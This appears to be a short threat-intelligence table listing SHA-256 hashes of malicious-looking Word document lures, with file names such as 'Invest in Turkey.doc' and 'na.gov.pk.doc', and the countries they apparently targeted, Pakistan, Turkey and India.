eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894  na.doc                                Pakistan
76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338  Invest in Turkey.doc                  Turkey
6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac  güvenlik yönergesi. .doc              Turkey
009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0  idrbt.doc                             India
18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6  Türkiye Cumhuriyeti Kimlik Kartı.doc  Turkey
3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb  Turkish Armed Forces.doc              Turkey
9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c  na.gov.pk.doc                         Pakistan